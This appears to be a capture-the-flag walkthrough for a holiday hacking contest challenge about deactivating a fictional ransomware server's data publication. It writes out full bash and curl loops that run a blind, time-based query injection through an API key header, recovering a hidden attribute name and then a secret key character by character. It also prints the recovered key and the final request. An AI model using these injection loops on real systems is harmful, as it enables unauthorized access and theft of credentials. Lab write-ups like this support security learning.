Skip to content

Deactivate Frostbit Naughty-Nice List Publication⚓︎

Difficulty:
image

This challenge was not completed as part of the contest since someone else's walkthrough was used to help me learn and I completed the challenge after the deadline.

Objective⚓︎

Wombley's ransomware server is threatening to publish the Naughty-Nice list. Find a way to deactivate the publication of the Naughty-Nice list by the ransomware server.

Hints⚓︎

Frostbit Publication

There must be a way to deactivate the ransomware server's data publication. Perhaps one of the other North Pole assets revealed something that could help us find the deactivation path. If so, we might be able to trick the Frostbit infrastructure into revealing more details.

Frostbit Slumber

The Frostbit author may have mitigated the use of certain characters, verbs, and simple authentication bypasses, leaving us blind in this case. Therefore, we might need to trick the application into responding differently based on our input and measure its response. If we know the underlying technology used for data storage, we can replicate it locally using Docker containers, allowing us to develop and test techniques and payloads with greater insight into how the application functions.

Gold Solution⚓︎

Knowns⚓︎

We know from our strings queries during the Decrypt challenge that the UUID is used for interactions with the API and we also know from the SantaVision challenge that there is a file path for deactivating: /api/v1/frostbitadmin/bot/<botuuid>/deactivate.

Hint from SantaVision Feed

Error msg: Unauthorized access attempt. /api/v1/frostbitadmin/bot/<botuuid>/deactivate, authHeader: X-API-Key, status: Invalid Key, alert: Warning, recipient: Wombley

UUID: 9c5e7d5a-0d19-4ed0-9f93-017cab14fd7d

Test endpoint⚓︎

testing

After these basic tests, we have established that our UUID is good for the API testing and the X-API-Key is vulnerable to some sort of injection.

requestBlocked Further testing indicates that the usual ways of retrieving output from the injection are being blocked. We need a way to find the omitted key name associated with the {user_supplied_x_api_key}.

Create a Bash Command to Blindly Test Each Character for the Omitted API Key's Attribute Name⚓︎

for i in {a..z} {0..9} '_' '-' '#' ; do echo "Testing $i"; curl --max-time 1 "https://api.frostbit.app/api/v1/frostbitadmin/bot/9c5e7d5a-0d19-4ed0-9f93-017cab14fd7d/deactivate?debug=true" -H "X-API-Key: Test' || (      SUBSTRING(ATTRIBUTES(doc)[0],0,1) == \"$i\"    ?sleep(30):2) || '" ; echo ""; sleep 1; done
Explanation of Command

Character Set⚓︎

{a..z} {0..9} '_' '-' '#'
The set of characters to test includes all lowercase letters (a-z), digits (0-9), and specific special characters (_, -, #).

Conditional Logic Injection⚓︎

Test' || (SUBSTRING(ATTRIBUTES(doc)[0],0,1) == "$i" ? sleep(30) : 2) || '
SUBSTRING(ATTRIBUTES(doc)[0], 0, 1): Extracts the first character from the ATTRIBUTES(doc)[0] field and then the 0, 1 indicate the starting point (index 0) and how many characters (1).
== "$i": Compares the extracted character to the current character being tested ($i).
? sleep(30) : 2: If the comparison is true, the server sleeps for 30 seconds; otherwise, it continues normally.

Output and Rate Limiting⚓︎

echo "Testing $i"
curl --max-time 1 ...
sleep 1
Prints the current character being tested for logging.
--max-time 1: Ensures the request times out after 1 second, preventing prolonged wait times for non-matching characters.
sleep 1: Adds a delay between requests to avoid overwhelming the server or triggering rate limits.

blindKeyNameExraction

This blind process is repeated until the entire key is revealed: deactivate_api_key

Now that we have the attribute name, we can modify the bash command to pull out the value of the deactivate_api_key. Knowing that the UUID is likely what is used and it is made up of characters a-f, 0-9, and -, this simplifies what we need to iterate through. 

for i in {a..f} {0..9} '_' '-' '#' ; do echo "Testing $i"; curl --max-time 1 "https://api.frostbit.app/api/v1/frostbitadmin/bot/9c5e7d5a-0d19-4ed0-9f93-017cab14fd7d/deactivate?debug=true" -H "X-API-Key: Test' || (      SUBSTRING(doc.deactivate_api_key,0,1) == \"$i\"    ?sleep(30):2) || '" ; echo ""; sleep 1; done
findingUUID Once the command has retrieved the indices 0-35, it is expected that the next one for index 36 will return no results since the known UUID is 36 characters long, but running it helps us just confirm that we are done. 
for i in {a..f} {0..9} '-' ; do echo "Testing $i"; curl --max-time 1 "https://api.frostbit.app/api/v1/frostbitadmin/bot/9c5e7d5a-0d19-4ed0-9f93-017cab14fd7d/deactivate?debug=true" -H "X-API-Key: Test' || (      SUBSTRING(doc.deactivate_api_key,36,1) == \"$i\"    ?sleep(30):2) || '" ; echo ""; sleep 1; done

deactivate_api_key

abe7a6ad-715e-4e6a-901b-c9279a964f91

Having the correct API key means we can now craft our curl command: 

curl "https://api.frostbit.app/api/v1/frostbitadmin/bot/9c5e7d5a-0d19-4ed0-9f93-017cab14fd7d/deactivate?debug=true" \
-H "X-API-Key: <correct_api_key>"

Output

{"message":"Response status code: 200, Response body: {\"result\":\"success\",\"rid\":\"9c5e7d5a-0d19-4ed0-9f93-017cab14fd7d\",\"hash\":\"21f4af748683f9b22a3e291b38ccf294f29a1d6867bcc85dac4b2683bc326f5b\",\"uid\":\"80065\"}\nPOSTED WIN RESULTS FOR RID 9c5e7d5a-0d19-4ed0-9f93-017cab14fd7d","status":"Deactivated"}